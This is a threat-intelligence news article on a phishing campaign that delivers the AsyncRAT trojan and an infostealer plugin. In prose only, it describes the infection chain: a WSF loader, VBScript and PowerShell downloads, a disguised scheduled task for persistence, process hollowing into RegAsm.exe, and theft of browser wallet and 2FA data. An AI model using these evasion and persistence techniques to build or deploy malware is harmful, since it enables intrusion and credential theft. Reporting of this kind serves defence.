Evasive Phishing Campaign Delivers AsyncRAT and Infostealer
Cybersecurity researchers at eSentire’s Threat Response Unit (TRU) have uncovered a sophisticated phishing campaign distributing the AsyncRAT remote access trojan (RAT) coupled with the Infostealer plugin. The attack employs deceptive tactics to bypass security defenses and infiltrate victim systems.
The infection chain is initiated with a phishing email containing a malicious archive. Upon execution, a cleverly disguised Windows Script File (WSF) sets off a series of events, including downloading and executing obfuscated VBScript and PowerShell code. This complex process ultimately culminates in the deployment of AsyncRAT and the Infostealer plugin.
HTML character entities found in the malicious WSF file
The infection process begins with the .wsf file, which fetches a VBScript disguised as a text file from a remote server. This VBScript leverages PowerShell commands to download and extract a ZIP file masquerading as a harmless image. The contents of this ZIP file include additional scripts and executables that work in tandem to establish and maintain the AsyncRAT presence on the compromised system.
Key steps in the infection chain include:
- Downloading and Extracting Malicious Files: The VBScript uses Start-BitsTransfer to download a seemingly innocuous image file, which is then saved as a ZIP archive. This archive is extracted into the public directory on the compromised system.
- Executing Malicious Scripts: The extracted files include additional VBScript and batch files that execute in a hidden window, avoiding detection by the user.
- Establishing Persistence: A PowerShell script creates a scheduled task named “MicrosoftEdgeUpdate500” that ensures the continuous execution of malicious code every two minutes. This persistence mechanism is critical for maintaining control over the infected system.
- Process Hollowing: The final stage involves process hollowing, where the AsyncRAT payload is injected into a legitimate process, RegAsm.exe, making it harder to detect.
AsyncRAT, once installed, opens a backdoor on the compromised system, allowing attackers to remotely control the machine. However, this variant of AsyncRAT also comes equipped with an infostealer plugin, significantly amplifying the threat.
The infostealer plugin is designed to exfiltrate sensitive information from popular web browsers, including Chrome, Firefox, Opera, and Edge. It specifically targets cryptowallet extensions such as MetaMask, Phantom, and Binance, as well as 2FA authentication extensions. This combination of remote access and information-stealing capabilities presents a dual threat, enabling attackers to both control the infected system and steal valuable data.
eSentire’s TRU emphasizes the ongoing threat of phishing emails and urges users to exercise caution when interacting with unsolicited messages. Additionally, keeping security software up-to-date and employing robust email filtering solutions are crucial in mitigating the risk of such attacks.
